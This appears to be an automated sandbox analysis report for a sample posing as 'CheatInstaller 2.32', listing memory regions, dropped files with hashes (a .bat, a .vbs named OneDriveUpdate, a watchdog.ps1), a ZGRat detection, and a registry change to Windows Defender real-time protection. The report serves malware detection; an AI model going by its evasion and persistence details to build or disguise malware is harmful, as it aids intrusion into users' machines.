memory/4828-3701-0x00000114F98E0000-0x00000114F98F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\progressgood.bat

MD5 845cf6630a4a8d184f93d0f732feb846
SHA1 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA256 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512 bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e

memory/4828-3728-0x00000114F98E0000-0x00000114F98F0000-memory.dmp

memory/4828-3741-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

C:\Windows\Installer\MSIA157.tmp

MD5 6a2885110ffd43a2c24732c28f21b095
SHA1 11e3c5290358e55baad1808801694716ab7a7cb8
SHA256 ea9b8251470ca65ce7413074ba123d6bb41bbaa08b9966f7c3f888dac774efd5
SHA512 f4b4031c6bcd8ffe43d04957a99627d386c26729e0c8c427c7dfa934b58312ca990dffb941d5cdcd2e30234bc0c59044589bd818f97e904ee5d56b02a616daac

\Windows\Installer\MSIA1F4.tmp

MD5 e17879bfc40fc8dcf325cb5842e317af
SHA1 a63c1b35b95e709b27fd9527171ecef3d002f380
SHA256 668bd35838a3e1f32feefe5a67cbea5e674e66b7f6ea98099fd553260a0f1454
SHA512 6beee1168b48103e6efdbb59a570d4501e1a9bc356fcf860ea8a89079b2e98e348f88ce0ab44f29b84e06d5b12a2bafba5238d3c490d06b83b066e5eee206f8e

C:\Windows\Installer\MSIA1F4.tmp

MD5 862b0ac81f575e9d4ce014488d86b701
SHA1 a2221da312f90d805bb03811459b80a9cb04708c
SHA256 2b937c08a52c4426c009fbed9bb43d541254677534f1f0052b69f8cfcbf3181f
SHA512 63b4cb09c0bdad885f066556e642966c2e4bf2f6190259ad16a1468725aae1144248e2bd2b4493bc45e419496f8e917b0cd7621f9e356e1262460917866c1f7c

C:\Windows\Installer\MSIA282.tmp

MD5 297946be185139ff4c0442c8f304de65
SHA1 d3ac19044da7398a7feecda62d4a1ff21c033d8d
SHA256 a5bd62a2ae28b5b236ff690e8fad97056eeb27277dacbc36d297eaba624942d8
SHA512 d77586aa68add5763952fb43a7f1f6cea91a62c0425ae844538148320b6c7c514b4a8e9f7919a386cfa42165f156195865c150306e1e9e3cd788b57caff58d0f

\Windows\Installer\MSIA282.tmp

MD5 3511da11bfcd1938bd42f8fe85b2aa4a
SHA1 28a27541b0df155ded02e7890bdf2eca4241d3e9
SHA256 97ae5c787edf7a9e0029becb1735e7ca394058a436474dbcf5aed632b4dc7d18
SHA512 ef90f971d5a29a719f836b16659830edcf7e4ba1ad18a22919f45c42a80ba4a58d1e1982eaa830a9834eaa0171ddd0491d1c9b20aad6d4d4d24ff427d55b8419

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav

MD5 f4f03335c62f1018cdcf871c6251c49f
SHA1 1b5f9a72713a29898da1d2c85cfac9dc044c5554
SHA256 605bc1a2fa051d1dc0ad3ddb82d30fb8d0ecd8be27a9c7f6407dd6c3ccb13901
SHA512 451c87ec05f8889179bd64344863fca0c616437054594b812bd225b9f97a1926d94019a73520a14e5165781440faf8814cf3c1b789945ff97abb3c7bd30b1a0b

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv

MD5 2620f56f03159589486b831d9b6adc4a
SHA1 55dfc135be75692bd64c50b429dcd5460e0b0b90
SHA256 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA512 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs

MD5 214ee30dbd649af9294f254fc8c33d07
SHA1 e81a7486c5c19868abb7d39fc757f686c4124662
SHA256 d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512 f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav

MD5 6ee784b8518e5b4e0c4f13811e4a5a1c
SHA1 ac459e28ef22adade9e544d010104e3df49dbdcf
SHA256 31b1b4258dd460c18e25b4d78dc6d6a21d4934da70a22916b2a14ae5c7ad83c6
SHA512 03a8a11d9bf7332bdfc1db7a6b8335ab75a145e218763acfeff4484ace85334e70a09021e473be52ba158ba8faf21c1c471493b4a94f8afa81474b205baa1370

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav

MD5 5e6c8c915d753cbce5a8b6ebb5d543c3
SHA1 a4be7aea933e7be3eafa8f58e113ce0e402a38a2
SHA256 a09330dda1980b494e134cb8578fca2996d72cb50a9c5258ad5c0c56d4bd8df2
SHA512 8edf5cf8388dc4426b47c482d29306b46bddc1c74ae0089cb62acf3ad2a2a5a9e1b7698df6edee7dbbf2378f2e857de8d0ff6d1d2c95c450d9a75fa776e821a0

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\slow_log.frm

MD5 5cf177c70e9be2f41adc86ea7e0fc48b
SHA1 9a597f4d25a0fb4837fa06b9b3792de65fae9551
SHA256 9276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3
SHA512 054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav

MD5 6a2375d06116eefceafa17cc9ab65aff
SHA1 dda7e0015f6ec4bf68adfc4a1ea2760465f962a7
SHA256 0aa732707387384aac22b8258b6b9cceb3981e20e7dde5be15e74994bef3bfa5
SHA512 741af0f543b040a6cdfa012888b49699679bfa2ff5b5a3bb88414939f7e563e51bedac79767383a294b3c97d55a95f1c720e73d031098b879f5fac884cfe8fc3

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav

MD5 aa0d37599862b87bdfcbc91cf0e1240b
SHA1 c485bc930646df67617a864ae56fbaa1c5c81cba
SHA256 90fc63b27c79af87ddf6b7190a187fdb908977cf2e7cd201759a625c35c1c809
SHA512 b15ad3cbb44c04ebd7ce3a9c97b094ca312a914b0c022c0e2b995675388d15683ed6924e41d03e4fd306e8bf3161c026f11bb1eb1884faf5303013ce13702768

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav

MD5 026ea5d0cd7a7ecc57abeb718ddd3e0b
SHA1 1d82861d6e4d73310111f88c18ecef60e6d1f2a7
SHA256 1096269995c6f7cdf640f8c1996ba5fb7756e57f6b3ac9b8e3a370871230e6fa
SHA512 5cb830bf90726bf1957128c96daed3cec19ae1de307340ba6a276875d3d43105bfaf2fc43a370742d3aad821e4b9774e74dc1766d39386600597fad8bd6445cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav

MD5 34db1dbd709be1bb4fe40cbcd2539dfe
SHA1 4a7bbc1a6655b85844e683929ee73ca41bbc21c3
SHA256 c2d17b1aff1fd4e7ca9a801507abc1ebe105fc7d5493a55b36b17feee2753fc7
SHA512 77296b89cc1d946944b059710e0b0bf41580cd5659fc46d80c06cbeb50821472468424e8514a362e463de19fa9178acfb8cadb52bee76ed566402c589186f43c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav

MD5 5912dee398468334dc42fd64ef2bde58
SHA1 3e3bcfc69f4f41c1640bfa1e19363dfa432b3d09
SHA256 531b49947c78e55c06eec444ee4302ad2f19c17ce3d7378f3be99d9a71cebaa7
SHA512 237a8d30cf0432bff45c26e22a8178848ff580b9810f8c297a9b0a45cd2bba18f4e5c7ea1e8a531a0c4b28cd20dbd4b3d698e14546889d263629496f92249cdb

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav

MD5 ee815fed9e94a1fbf1d9d4cfe7b73658
SHA1 db3bd9c4ae0fb46dee54f5a6999640f48e44f055
SHA256 fb35be3b16679eba0882e19140244c49bee292497ec4dd512756a01abb220a15
SHA512 770826be6da709148dadfc0ef869658175a6c453aa0fa33ddf175a129b89f6088c7b01e4c90b30e4cdcd0efbbf10a5e41161505f94d82e88230e20da62c16dc1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav

MD5 80fefc7eb54b94d4d62dfae2f256f429
SHA1 e2c7fab9582b28d62496b2403257481c3293aba8
SHA256 997045219957af8046d4f282a2728b49bbe158c6714d9cfc4cd8f9487e358449
SHA512 08fac88b57e65876335a1e6ccbdb646f4d575ac077c58c27900bc2fb76266f2f491767d7e9eff6524acbbd4b149e3a140af5752bd8327b948e7c1d1a4f619935

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav

MD5 d8ec5563cba66790dd05bd281187549c
SHA1 72737c1055c9ea31ab2a38d6929d013132b37073
SHA256 52b04ece87f1e082afb0f7cd591ed883b22f1dd112ebc48352ee600153d74bfb
SHA512 c08da5e7812458f4870049bc4b4622e4bfebafb0dc1619a3cf3d1af76b435cdda6b59034c932d5d3186bfe09d69a0be0c59b209ebc6f18f464cff191abb38474

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav

MD5 278b177cec173944a7c97876619a5312
SHA1 7cffa0049783a8e32cd3f7ac57673d05a53614b9
SHA256 618a78b42103c246e446ca3723d62b5fe696cebbc8998ffc9a26fa4fad5dc729
SHA512 54e5d69172ff271d72bafc8b3aae8c004c44d6072674d43241359977479164e139f3c87709874a5913b7c04e149305189996e67a84dea22ebeaeda6940b2da45

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_topic.frm

MD5 ccaca741f4002cb8af48d485501ec8e9
SHA1 4895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3
SHA256 0e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1
SHA512 09f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\general_log.frm

MD5 ea26bb989e3e2c321a47d499d2682ae1
SHA1 a79e8c99186c20fb09f1457b3d183538e1e1b1bb
SHA256 4a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81
SHA512 07f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI

MD5 f0bb4307afbd586f0499f4023213863d
SHA1 cd978f445f02aab75b1d89c5e28e348860d8c306
SHA256 49a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129
SHA512 a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI

MD5 b7d1f26327bf857bf6ce98ea4fda22b1
SHA1 b3f9c0dd62d5a7f533be36664f8e4954cd1f216d
SHA256 7ce3f6771b4c0a0c0e662dc51ecb460aae223bb3292eaea6c1c6f1bb805b3786
SHA512 91e83b2a3aa885e240f2634d15662954aa0d1104b85ae7bf33948b6bcffcbf763baddb3ecdabd15de53d6eda23d765716891b4dbaaf70168b837480f055e5ab2

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_sc09.wav

MD5 963ff7b5bcab4bbcc4bc7b29765a43f9
SHA1 e1fa49a04c0cf8f8ccd97153f782373975840853
SHA256 38767a3308cac21e05cb6f02e5ee8a508a213b98a64ade435b10dbb6b48cdbb4
SHA512 fb376c6864a50d0c0b9b865131e8b3734b963546aa35a7c211b47fb70add90dfd0cde83947260d29c891a46f215e99673dca816ec42c417e62c6ddcb71c041a3

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_ita.txt

MD5 89e2a161df2ef245781707ff93e978bc
SHA1 ab2189d5c8dca09cade0586b929f0264c327db32
SHA256 b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a
SHA512 0e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.frm

MD5 ac330f2a89a6c828059d1f125cb9cb60
SHA1 a40b10eae1fba1ea43ff70b3941a165d6d0502f2
SHA256 9b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec
SHA512 0fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1

MD5 beceb9c4ac840a5ac0b51d8774e63149
SHA1 ea375fee5ff404065ba724e877c9a9b01509353b
SHA256 d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA512 48e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav

MD5 31fd1f037054b46d6160f1feac1342f5
SHA1 7a2e5d1f2ed0c606c2131a643d1648009cfe25de
SHA256 9ff6e9b0e96849daa3c74ffe6b27b98184bef7b8a67995b10b7242bcb1e7bcc3
SHA512 5b8b211b917a03a600d6f46124cf4de5c47c165c0ecf0f74b4680caffe546101c55f02d728e70d01032a4825338165fb2bf00eef4a046ce17d3cbeebdae3ef4f

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt

MD5 5b1a12edc7b4e82163e5b39694e5b630
SHA1 088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA512 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_drums.wav

MD5 05034adf1b1fbfbf7d760415f620b9b9
SHA1 b76945e64fdc92425dec2b7ce131e11135b9c9ab
SHA256 d803719da977874a7352f0fa42bc9948e0e633d298867b3e45d9ea232c8975c5
SHA512 0c8b469a2aef25d29889ea8a8fecb8588dd98363283ec22a8adf12fd9d3b64eeede63519bbd25b02a4c807df57cae8025e9f84af6c7f7487c749a73f88a189e1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav

MD5 d99ec27abc9edccb6a1a9021bf100282
SHA1 3ad342540cfdfb51b2cdcd9754d5107aa54bdcb3
SHA256 e9d1307986868116f16a97c6b833f75b5de2588b610210e80fe82fe4dd8eb865
SHA512 2844b81179d758c3fc7d8ce2d154dbcd8a6076fb61f5ef7d91140db92fca271cc7026eca46487a21f2d89f1350c4ee7dafe80b7822769f9d8b054b4aa361d1f3

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav

MD5 a40a8f1aa6927fdb7a0f450cf787c68a
SHA1 7572f176b99e6f40799818916074b2b6d88c40e4
SHA256 aed5fa583e5833867a5f64f912a5ca399a192fe3ed1b817cc2b406ad88a80f4a
SHA512 449e1f63045fc9d68ef3a8d2f279695e50bee2c474d5d73d0b95e5d102221294fdd08ee01e35a618edbb9aae576963d2c82db23042ec5162ea9dd93fa87586fd

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav

MD5 d25a20ebedcd91d6c5eadeb091425b0e
SHA1 a5054071e6b2df9191070af26ea862a485b8133f
SHA256 8d3cd8972355515c1fe8f44794f6104fffcc29e02f00bfe3f6fd2bba13b0b84a
SHA512 1dd167ec691721668c9a215483acc9e048edbb17a62abae9e9d309f5421ad7981d371a9cbd74619f4ae1ceb3dc0a99c1d44cc899010fa41af6b9aca62dbc458a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav

MD5 f95e5f321b21d7d9df533b711c691a46
SHA1 fd377691a4338098ff79180ff6cb50b86d158ac4
SHA256 6d9a44e5994766b84dc32dc0314e6a2103427ba6ae924b8e2e8c67e731e1d8ef
SHA512 e38ce699865e3e88aad9f62f098e4c4ff99a0d664b9d8fc5acdaa6fd747efc7e9e17c7d2ea511e2fb645c894720e0f9a22b0e5ad66bc714d1e04f38cf641cab9

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav

MD5 c0b378429a161b5485a848926cfd0fd8
SHA1 9f37eb59ab5529856d21c1b5391d4e7f483948cd
SHA256 e0d13bba45942b2c5c359ae5eb6843089a89b025e2e332b37010586fdfe97bc0
SHA512 966496016b1630ef24b064515d817912f1d71fc7c8c33712ad1f2dbfb6d043e341ce0d0db16365723c999d9607217e0dab61bde8ee1cf52a49ac3d4ec6ffdcea

C:\Windows\Installer\MSIAB73.tmp

MD5 cac17c92ed0d30bc68ce60905e0af1ea
SHA1 29589b5816214f537ffb03a4ff9c79f1bd25908b
SHA256 e5a59959b68626f622c7a27b2a42468dbfe03a6d956b58b2cdccedf0a632d161
SHA512 041aab2032745c2f800ac05ee77073167bf37f81dee56774b498c8f1b60fdcc8f16904e909ed42ef9157dfebeada9998d5c155aa1a10df1ccd608177425acc20

C:\Windows\Installer\MSIAC9F.tmp

MD5 c9715722b186bdb2718a07e0cff87096
SHA1 e3b29e2a15070cc0bd3b1d6c051757c22e65d753
SHA256 10784b7c2ecae75c7e27f664972355b2bdb1077cbb3c8db3a3c4b71b576370a7
SHA512 e704efed69273ea8e548adba90d082a879b0f723125025f3a7b0def177adf6090ae39425aa6dcc39f0263d8a0f27154762f7090d34f02ac67a4b6d57a6f8e75e

memory/4652-3917-0x0000000000FB0000-0x0000000000FE6000-memory.dmp

memory/4652-3919-0x0000000001040000-0x0000000001050000-memory.dmp

memory/4652-3918-0x0000000071040000-0x000000007172E000-memory.dmp

memory/4652-3920-0x0000000001040000-0x0000000001050000-memory.dmp

memory/4652-3921-0x0000000006FE0000-0x0000000007608000-memory.dmp

memory/652-3924-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/652-3927-0x00000177F2300000-0x00000177F2310000-memory.dmp

memory/4652-3928-0x0000000007640000-0x0000000007662000-memory.dmp

memory/4652-3929-0x00000000076E0000-0x0000000007746000-memory.dmp

memory/4652-3930-0x00000000078C0000-0x0000000007926000-memory.dmp

memory/4652-3933-0x0000000007940000-0x0000000007C90000-memory.dmp

memory/652-3947-0x00000177F2300000-0x00000177F2310000-memory.dmp

memory/4652-3954-0x0000000007C90000-0x0000000007CAC000-memory.dmp

memory/4652-3956-0x0000000007DD0000-0x0000000007E1B000-memory.dmp

memory/4652-3971-0x0000000008110000-0x0000000008186000-memory.dmp

memory/652-3970-0x00000177F2300000-0x00000177F2310000-memory.dmp

memory/652-3983-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/3532-3986-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/3532-3989-0x0000017AC8C00000-0x0000017AC8C10000-memory.dmp

memory/3532-3991-0x0000017AC8C00000-0x0000017AC8C10000-memory.dmp

memory/3532-4007-0x0000017AC8C00000-0x0000017AC8C10000-memory.dmp

memory/4652-4033-0x0000000071040000-0x000000007172E000-memory.dmp

memory/3532-4035-0x0000017AC8C00000-0x0000017AC8C10000-memory.dmp

memory/4652-4038-0x00000000097B0000-0x0000000009E28000-memory.dmp

memory/4652-4039-0x0000000008F00000-0x0000000008F1A000-memory.dmp

memory/3532-4040-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/4652-4042-0x0000000001040000-0x0000000001050000-memory.dmp

memory/1348-4046-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/1348-4051-0x0000019564B40000-0x0000019564B50000-memory.dmp

memory/1348-4049-0x0000019564B40000-0x0000019564B50000-memory.dmp

memory/4652-4055-0x00000000091A0000-0x00000000091C2000-memory.dmp

memory/4652-4054-0x0000000009210000-0x00000000092A4000-memory.dmp

memory/4652-4057-0x0000000009E30000-0x000000000A32E000-memory.dmp

memory/1348-4080-0x0000019564B40000-0x0000019564B50000-memory.dmp

memory/4652-4079-0x00000000094B0000-0x0000000009542000-memory.dmp

memory/4652-4122-0x0000000001040000-0x0000000001050000-memory.dmp

memory/1348-4124-0x0000019564B40000-0x0000019564B50000-memory.dmp

memory/4652-4121-0x0000000006C50000-0x0000000006C5A000-memory.dmp

memory/3956-4132-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/1348-4128-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/3956-4135-0x00000223C5E60000-0x00000223C5E70000-memory.dmp

memory/3956-4133-0x00000223C5E60000-0x00000223C5E70000-memory.dmp

memory/3956-4150-0x00000223C5E60000-0x00000223C5E70000-memory.dmp

memory/3956-4177-0x00000223C5E60000-0x00000223C5E70000-memory.dmp

memory/3956-4180-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/1860-4186-0x0000023FB5970000-0x0000023FB5980000-memory.dmp

memory/1860-4187-0x0000023FB5970000-0x0000023FB5980000-memory.dmp

memory/1860-4184-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/1860-4202-0x0000023FB5970000-0x0000023FB5980000-memory.dmp

memory/4652-4225-0x0000000001040000-0x0000000001050000-memory.dmp

memory/1860-4226-0x0000023FB5970000-0x0000023FB5980000-memory.dmp

memory/4600-4232-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

memory/4600-4234-0x000001BEF3220000-0x000001BEF3230000-memory.dmp

memory/4600-4235-0x000001BEF3220000-0x000001BEF3230000-memory.dmp

memory/4600-4260-0x000001BEF3220000-0x000001BEF3230000-memory.dmp

memory/1860-4228-0x00007FFB7ADA0000-0x00007FFB7B78C000-memory.dmp

C:\Windows\Installer\MSI29A3.tmp

MD5 22e17f90d0e20a01a7aedac7df47e04c
SHA1 4ac002437fa5f0a34e10f0b2b81b88cb14446363
SHA256 5beb3d846fab29ddc7f5b84baebd9b24d30ba618438ac7f9aca153111fc5388d
SHA512 d16d6ce5cc5ef6ac6fdd86a3341961d95d01161b9bab7d11a0dedf02fc62fb930622e33a86a9cc6e893040bf0e4ff757627a7eab49abbaf6f9e21f3c40744cd1

C:\Windows\Installer\MSI29A5.tmp

MD5 ce5552c3b309a5f507b31c0af0c0cabf
SHA1 5a5a35ea887677e411ea5ea86dd6881d62db6edf
SHA256 3c2dc5ba528d5c31cefacc19f693b35512eb7d500511b0dbc79762d3f5f7842c
SHA512 4234ee20b71d6f0bed70179344c830be3b18ff53c3652c559f2bc2cd2b7dae142761a8ba77ef2102ac87351ccbb83ee50c855259dd0d7178a75b4412dc5b2389

C:\Windows\Installer\MSI29E4.tmp

MD5 18db7a45912d1664716efdf6e311f5f1
SHA1 24a5d1d2addf8095e6f5e4040a2e1c44956bb141
SHA256 5ffa59b2cb0995af80de9ce944bb3e2933c42cea0d764c0af137ff842dc7fd0c
SHA512 5bc3db53b113d9098170eac6ac1fd2327e6e02f6e5e5e6a5c48e861e1ff683fd2a88928638a0f046a8b89488d6ce1f9eba9952aa34b5ab0858f671b890f250ff

C:\Config.Msi\e579a10.rbs

MD5 c60a83324beb127de6cc8e4440ade511
SHA1 9e8bd94721d16b98f599434925e5db76199100ba
SHA256 85b3970e5ade88ac4722a84df908dedda19f30af3d5a9cc479af1cbd510f20b0
SHA512 ea591d64774acef587d1d194f647603459661020f74638d182317e66e1dbf2849ceb0883929f1349f3f6f03a3243b921bc7e895737b340af66cfc5aea0bdd078

C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\mock-globals\.gitignore

MD5 8da13f306c8c0f4f4a32960e93725b42
SHA1 b9ee3f4a8b64284a8f698206993e4ec2cf83f66f
SHA256 ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0
SHA512 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc

memory/4188-4949-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/4188-4951-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/4188-4954-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/4188-4957-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/2412-4958-0x0000000005590000-0x000000000580F000-memory.dmp

memory/2412-4960-0x0000000005590000-0x000000000580F000-memory.dmp

memory/2412-4965-0x0000000005590000-0x000000000580F000-memory.dmp

memory/1588-4964-0x0000000004D40000-0x0000000004FB0000-memory.dmp

memory/1588-4970-0x0000000004D40000-0x0000000004FB0000-memory.dmp

memory/4188-4969-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/4188-4975-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/1588-4976-0x0000000004D40000-0x0000000004FB0000-memory.dmp

memory/2412-4977-0x0000000005590000-0x000000000580F000-memory.dmp

memory/2412-4971-0x0000000005590000-0x000000000580F000-memory.dmp

memory/2412-4983-0x0000000005590000-0x000000000580F000-memory.dmp

memory/4188-4981-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/1588-4988-0x0000000004D40000-0x0000000004FB0000-memory.dmp

memory/4188-4987-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/1588-4982-0x0000000004D40000-0x0000000004FB0000-memory.dmp

memory/2412-4989-0x0000000005590000-0x000000000580F000-memory.dmp

memory/4188-4993-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/4188-4999-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/2412-5001-0x0000000005590000-0x000000000580F000-memory.dmp

memory/1588-5000-0x0000000004D40000-0x0000000004FB0000-memory.dmp

memory/1588-5006-0x0000000004D40000-0x0000000004FB0000-memory.dmp

memory/2412-5007-0x0000000005590000-0x000000000580F000-memory.dmp

memory/4188-5005-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/2412-4995-0x0000000005590000-0x000000000580F000-memory.dmp

memory/2412-5013-0x0000000005590000-0x000000000580F000-memory.dmp

memory/4188-5011-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/1588-5012-0x0000000004D40000-0x0000000004FB0000-memory.dmp

memory/1588-4994-0x0000000004D40000-0x0000000004FB0000-memory.dmp

memory/4188-4962-0x00000282D95A0000-0x00000282D9CDB000-memory.dmp

memory/1588-4961-0x0000000004D40000-0x0000000004FB0000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-18 19:06

Reported

2024-03-18 19:18

Platform

win10v2004-20240226-en

Max time kernel

269s

Max time network

389s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
